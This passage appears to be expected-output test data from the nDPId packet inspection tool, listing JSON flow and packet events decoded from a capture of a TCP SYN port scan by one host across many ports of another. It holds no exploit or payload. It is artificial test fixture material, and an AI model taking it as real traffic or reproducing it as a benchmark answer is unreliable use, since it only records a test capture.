+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs0rwAAC8GRrasEAAIQA2GNIzTEOHdU4MZAAAAAGACEAAXqwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsBRoAAC0GFlmsEAAIQA2GNIzTHOrdU4MZAAAAAGACCAATogAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsYVAAADMGtCKsEAAIQA2GNIzTFgHdU4MZAAAAAGACEAASiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CgAAC4GLkqsEAAIQA2GNIzTC73dU4MZAAAAAGACDAAgzwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsAbcAACoGHLysEAAIQA2GNIzTF3bdU4MZAAAAAGACDAAVFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SoAADkGKkisEAAIQA2GNIzTBDjdU4MZAAAAAGACCAAsVAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs+G4AAC4GIgSsEAAIQA2GNIzTB9bdU4MZAAAAAGACDAAktgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsRx0AACwG1VWsEAAIQA2GNIzTD57dU4MZAAAAAGACBAAk7gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsiHkAADAGj\/msEAAIQA2GNIzTJw7dU4MZAAAAAGACBAANfgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NkAADgGE5msEAAIQA2GNIzTw1LdU4MZAAAAAGACBABxOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs6hsAAC0GMVesEAAIQA2GNIzTC8PdU4MZAAAAAGACCAAkyQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFEAAC4GUiGsEAAIQA2GNIzTC7vdU4MZAAAAAGACDAAg0QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsTisAADAGykesEAAIQA2GNIzTGzndU4MZAAAAAGACBAAZUwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmAAADIGmBKsEAAIQA2GNIzTZIfdU4MZAAAAAGACDADIBAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsDm4AADsG\/wSsEAAIQA2GNIzTGvXdU4MZAAAAAGACEAANlwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAseEgAADoGliqsEAAIQA2GNIzSBdbdUoMYAAAAAGACDAAmuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAsyqkAADcGRsmsEAAIQA2GNIzSFxfdUoMYAAAAAGACEAAReAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dQAACUGKZ6sEAAIQA2GNIzSgALdUoMYAAAAAGACCACwjAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBNYAADsGCJ2sEAAIQA2GNIzS92PdUoMYAAAAAGACEAAxKwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAs6IMAADgGJ++sEAAIQA2GNIzSBZrdUoMYAAAAAGACBAAu9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZcAADAGytusEAAIQA2GNIzSE8XdUoMYAAAAAGACBAAgygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AADcGCySsEAAIQA2GNIzSB\/3dUoMYAAAAAGACEAAgkgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsHVIAADEG+iCsEAAIQA2GNIzSA4\/dUoMYAAAAAGACCAAtAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqwAACgGscasEAAIQA2GNIzSF6vdUoMYAAAAAGACBAAc5AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsF7gAACwGBLusEAAIQA2GNIzSBK7dUoMYAAAAAGACBAAv4QAAAgQFtA=="} 